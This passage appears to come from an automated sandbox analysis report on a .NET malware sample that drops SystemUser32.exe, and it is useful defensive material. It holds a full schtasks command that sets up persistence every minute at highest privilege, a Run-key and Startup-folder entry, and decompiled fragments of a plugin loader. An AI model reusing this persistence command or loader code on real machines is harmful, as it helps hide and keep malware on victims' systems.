                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: SystemUser32.lnk.0.drLNK file: ..\..\..\..\..\SystemUser32.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: 5q4X9fRo4b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 5q4X9fRo4b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: Memory
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE00BD pushad ; iretd 0_2_00007FFAACCE00C1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7BB1 push E95D8EC9h; ret 0_2_00007FFAACCE7C79
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7C7B push E95D8EC9h; ret 0_2_00007FFAACCE7C79
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7C2D push E95D8EC9h; ret 0_2_00007FFAACCE7C79
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACBAD2A5 pushad ; iretd 8_2_00007FFAACBAD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACCC8605 push ebx; ret 8_2_00007FFAACCC86DA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACD92316 push 8B485F93h; iretd 8_2_00007FFAACD9231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACBBD2A5 pushad ; iretd 12_2_00007FFAACBBD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD0D85 pushad ; retf 12_2_00007FFAACCD0E0D
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD0D35 push eax; ret 12_2_00007FFAACCD0D43
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD00BD pushad ; iretd 12_2_00007FFAACCD00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD19F2 pushad ; ret 12_2_00007FFAACCD19F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACDA2316 push 8B485F92h; iretd 12_2_00007FFAACDA231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACBCD2A5 pushad ; iretd 15_2_00007FFAACBCD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACCE00BD pushad ; iretd 15_2_00007FFAACCE00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACDB2316 push 8B485F91h; iretd 15_2_00007FFAACDB231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACBBD2A5 pushad ; iretd 17_2_00007FFAACBBD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACCD00BD pushad ; iretd 17_2_00007FFAACCD00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACDA2316 push 8B485F92h; iretd 17_2_00007FFAACDA231B
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 22_2_00007FFAACCD00BD pushad ; iretd 22_2_00007FFAACCD00C1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 25_2_00007FFAACCD00BD pushad ; iretd 25_2_00007FFAACCD00C1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 26_2_00007FFAACCB0033 push ds; retf 26_2_00007FFAACCB003A
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 27_2_00007FFAACCD00BD pushad ; iretd 27_2_00007FFAACCD00C1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Roaming\SystemUser32.exe

                            Boot Survival

                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnk
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUser32

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
